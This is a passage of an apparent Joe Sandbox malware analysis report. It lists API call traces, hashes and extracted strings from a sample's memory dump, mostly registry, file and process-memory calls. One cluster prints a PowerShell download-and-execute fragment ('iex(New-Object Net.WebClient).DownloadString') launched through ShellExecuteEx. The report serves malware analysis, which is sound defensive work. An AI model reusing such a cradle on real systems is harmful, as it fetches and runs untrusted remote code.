                                                            • Opcode Fuzzy Hash: 583362e13d09cdfc368c59a5e43f3a595cc6197c76508fb149c039408e57bb50
                                                            • Instruction Fuzzy Hash: 342107B2A1421CABDB64DB54DC85FE9B3B8FB88700F00C198A609A6180DF756A85CFD5
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007476A4
                                                            • HeapAlloc.KERNEL32(00000000), ref: 007476AB
                                                            • RegOpenKeyExA.ADVAPI32(80000002,00FC82D8,00000000,00020119,00000000), ref: 007476DD
                                                            • RegQueryValueExA.ADVAPI32(00000000,00FD0408,00000000,00000000,?,000000FF), ref: 007476FE
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00747708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID: Windows 11
                                                            • API String ID: 3466090806-2517555085
                                                            • Opcode ID: babea9b53206cfc9b97fc430fe2492f02360795fbb431c9c7aa9f829efeb43c2
                                                            • Instruction ID: abef00d574fe159630cb22428049077e7f95abf2d12ec4a0e8e41e96c21487dd
                                                            • Opcode Fuzzy Hash: babea9b53206cfc9b97fc430fe2492f02360795fbb431c9c7aa9f829efeb43c2
                                                            • Instruction Fuzzy Hash: 0F0162B6A58204FFD704DBE4DC49FADB7B8EB88701F104454FA08D7291E7749944DB92
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747734
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0074773B
                                                            • RegOpenKeyExA.ADVAPI32(80000002,00FC82D8,00000000,00020119,007476B9), ref: 0074775B
                                                            • RegQueryValueExA.ADVAPI32(007476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0074777A
                                                            • RegCloseKey.ADVAPI32(007476B9), ref: 00747784
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID: CurrentBuildNumber
                                                            • API String ID: 3466090806-1022791448
                                                            • Opcode ID: 8d549b6b22d2bcdb23726423b012ea17e1b62f06b8b5d72284f72409486389ba
                                                            • Instruction ID: 93ea107ea263843ae071fe9fcf440cfe4606be264424dec4915fdb5d1745421b
                                                            • Opcode Fuzzy Hash: 8d549b6b22d2bcdb23726423b012ea17e1b62f06b8b5d72284f72409486389ba
                                                            • Instruction Fuzzy Hash: C70144F6A54308BBD700DBE0DC49FAEB7B8EB44701F004554FA09A7281DB7455409B92
                                                            APIs
                                                            • CreateFileA.KERNEL32(:t,80000000,00000003,00000000,00000003,00000080,00000000,?,00743AEE,?), ref: 007492FC
                                                            • GetFileSizeEx.KERNEL32(000000FF,:t), ref: 00749319
                                                            • CloseHandle.KERNEL32(000000FF), ref: 00749327
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleSize
                                                            • String ID: :t$:t
                                                            • API String ID: 1378416451-3646547331
                                                            • Opcode ID: 3ac8be224287e149a61ebdfa5d20399056cf12e1643528ba08768250a8da4cb7
                                                            • Instruction ID: f5f33ad05f0b3c5091b8bee8f453e4813e2e8a5123759b2025bbf5bb3059894c
                                                            • Opcode Fuzzy Hash: 3ac8be224287e149a61ebdfa5d20399056cf12e1643528ba08768250a8da4cb7
                                                            • Instruction Fuzzy Hash: 80F04936F58208BBDB14DFB0DC49F9E77B9AB88721F10C254BA55A72C0D774AA419B40
                                                            APIs
                                                            • memset.MSVCRT ref: 007440D5
                                                            • RegOpenKeyExA.ADVAPI32(80000001,00FD08F0,00000000,00020119,?), ref: 007440F4
                                                            • RegQueryValueExA.ADVAPI32(?,00FCFE68,00000000,00000000,00000000,000000FF), ref: 00744118
                                                            • RegCloseKey.ADVAPI32(?), ref: 00744122
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00744147
                                                            • lstrcatA.KERNEL32(?,00FCFE80), ref: 0074415B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                                            • String ID:
                                                            • API String ID: 2623679115-0
                                                            • Opcode ID: 52814c7cad432dadd836a55db1b61fa9b659266cbd16dcf5bd9881d3d5a6f580
                                                            • Instruction ID: c90f3ccf7efdc5107f545acb5b9392df3e629f02a51908e8ad69e3a794179a89
                                                            • Opcode Fuzzy Hash: 52814c7cad432dadd836a55db1b61fa9b659266cbd16dcf5bd9881d3d5a6f580
                                                            • Instruction Fuzzy Hash: F74148B7D10108ABDB14FBA0DC5AFFE737DAB88300F404558B62996181EA755BD88B92
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 00743588
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • strtok_s.MSVCRT ref: 007436D1
                                                              • Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
                                                              • Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpystrtok_s$lstrlen
                                                            • String ID:
                                                            • API String ID: 3184129880-0
                                                            • Opcode ID: 7216dba6bcf4e067dd2aee51ae4f811538fe09a656b8ec84d88cc7198a24fb2d
                                                            • Instruction ID: daa408d7789d9f9b8a0af3ab6b55a61c7a7cd1e0f99fab7c0e43fb4a130bdea0
                                                            • Opcode Fuzzy Hash: 7216dba6bcf4e067dd2aee51ae4f811538fe09a656b8ec84d88cc7198a24fb2d
                                                            • Instruction Fuzzy Hash: 9A413EB1D50109EFDB04EFA4D849AEEB778BF44304F108018F51A76291DB79AA09CFA6
                                                            APIs
                                                            • __lock.LIBCMT ref: 0074B39A
                                                              • Part of subcall function 0074AFAC: __mtinitlocknum.LIBCMT ref: 0074AFC2
                                                              • Part of subcall function 0074AFAC: __amsg_exit.LIBCMT ref: 0074AFCE
                                                              • Part of subcall function 0074AFAC: EnterCriticalSection.KERNEL32(?,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074AFD6
                                                            • DecodePointer.KERNEL32(0075A188,00000020,0074B4DD,?,00000001,00000000,?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E), ref: 0074B3D6
                                                            • DecodePointer.KERNEL32(?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074B3E7
                                                              • Part of subcall function 0074BE35: EncodePointer.KERNEL32(00000000,0074C063,007795B8,00000314,00000000,?,?,?,?,?,0074B707,007795B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0074BE37
                                                            • DecodePointer.KERNEL32(-00000004,?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074B40D
                                                            • DecodePointer.KERNEL32(?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074B420
                                                            • DecodePointer.KERNEL32(?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074B42A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 2005412495-0
                                                            • Opcode ID: 34f9bb69a7595c29098a5a62da874f119cda08671de2c22481e2ff865c02ffb2
                                                            • Instruction ID: edac2b74b90255bb928673cc1b48738489d71a01229fb069528d3ba6e1224f45
                                                            • Opcode Fuzzy Hash: 34f9bb69a7595c29098a5a62da874f119cda08671de2c22481e2ff865c02ffb2
                                                            • Instruction Fuzzy Hash: B1313B7090139ADFDF109FA9C88529DBBF0BF48310F14802AE514A62A2DBBD8C95DF15
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                                                            • ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
                                                            • LocalFree.KERNEL32(007402E7), ref: 00739A90
                                                            • CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                            • String ID:
                                                            • API String ID: 2311089104-0
                                                            • Opcode ID: 8d14aca08c535763c6def8b1a3d252e5bd8009c95286a5c0795b34be0159669c
                                                            • Instruction ID: 989d94641bc933a0d4a66e92b136162bc6c8bdffad80b1ee5e0165d01a9dc33f
                                                            • Opcode Fuzzy Hash: 8d14aca08c535763c6def8b1a3d252e5bd8009c95286a5c0795b34be0159669c
                                                            • Instruction Fuzzy Hash: 19314D74A00209EFEB14DF94C885BEE77F5FF48301F108258E915A7290D778A981DFA1
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0074C9EA
                                                              • Part of subcall function 0074BF9F: __getptd_noexit.LIBCMT ref: 0074BFA2
                                                              • Part of subcall function 0074BF9F: __amsg_exit.LIBCMT ref: 0074BFAF
                                                            • __amsg_exit.LIBCMT ref: 0074CA0A
                                                            • __lock.LIBCMT ref: 0074CA1A
                                                            • InterlockedDecrement.KERNEL32(?), ref: 0074CA37
                                                            • free.MSVCRT ref: 0074CA4A
                                                            • InterlockedIncrement.KERNEL32(0075B558), ref: 0074CA62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                            • String ID:
                                                            • API String ID: 634100517-0
                                                            • Opcode ID: 9fcaee390ab64a9f492d6a9cfc8d030ebdae799d7d9b840d642cf031759f89f4
                                                            • Instruction ID: 91b76b857525b96c0ce50ae0016bb518df1e84521b9030586b62086e407db3a3
                                                            • Opcode Fuzzy Hash: 9fcaee390ab64a9f492d6a9cfc8d030ebdae799d7d9b840d642cf031759f89f4
                                                            • Instruction Fuzzy Hash: E801C031A02719EBDB62EF68884A7AEB360BF00761F15C105F91067291CB6CAD40CBDA
                                                            APIs
                                                            • strlen.MSVCRT ref: 00746F1F
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0074719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00746F4D
                                                              • Part of subcall function 00746BD0: strlen.MSVCRT ref: 00746BE1
                                                              • Part of subcall function 00746BD0: strlen.MSVCRT ref: 00746C05
                                                            • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00746F92
                                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0074719A), ref: 007470B3
                                                              • Part of subcall function 00746DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00746DF8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                                            • String ID: @
                                                            • API String ID: 2950663791-2766056989
                                                            • Opcode ID: 159788594354031db031e4b8e5a3ac0ef82e9670e16672737901d7db965a241b
                                                            • Instruction ID: 0e99baf9cdeb2bf922111cf707f46e481f86981f1e730f2d136d5ae00881749f
                                                            • Opcode Fuzzy Hash: 159788594354031db031e4b8e5a3ac0ef82e9670e16672737901d7db965a241b
                                                            • Instruction Fuzzy Hash: 0F51F5B5E04109EFDB08CF98D981AAFB7B6FF88300F148559F915A7250D739AA11CBA1
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00736E2A), ref: 00736A19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: *ns$*ns
                                                            • API String ID: 1029625771-1389744233
                                                            • Opcode ID: 28049f066d8e040f4ed5164134ac2581122024f61d3f5d0604525be0069bf74f
                                                            • Instruction ID: d3e2092aaf221a121d310440e6bb722e5841d01c6e9d07b62b76f19e30b4c125
                                                            • Opcode Fuzzy Hash: 28049f066d8e040f4ed5164134ac2581122024f61d3f5d0604525be0069bf74f
                                                            • Instruction Fuzzy Hash: 8571A874A00109EFDB04CF48C594BAAB7B2FB88355F24C169E9099F356D739AE85CF90
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00742D85
                                                            Strings
                                                            • ')", xrefs: 00742CB3
                                                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00742CC4
                                                            • <, xrefs: 00742D39
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00742D04
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            • API String ID: 3031569214-898575020
                                                            • Opcode ID: 35dcdc43cf975cc9a535d1d1999d3aba1f96acf232ba851d6a0d35e252397d2a
                                                            • Instruction ID: 3cb536422bacb4f73bcb0e9cbc9ff35f50cc5eeff82084a86e9b04a7fa2b350f
                                                            • Opcode Fuzzy Hash: 35dcdc43cf975cc9a535d1d1999d3aba1f96acf232ba851d6a0d35e252397d2a
                                                            • Instruction Fuzzy Hash: F041F171D50208EAEB15FFA0C89ABEDB778EF14304F504029F416A7192DF782A4ACF91
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 00740DB8
                                                            • strtok_s.MSVCRT ref: 00740EFD
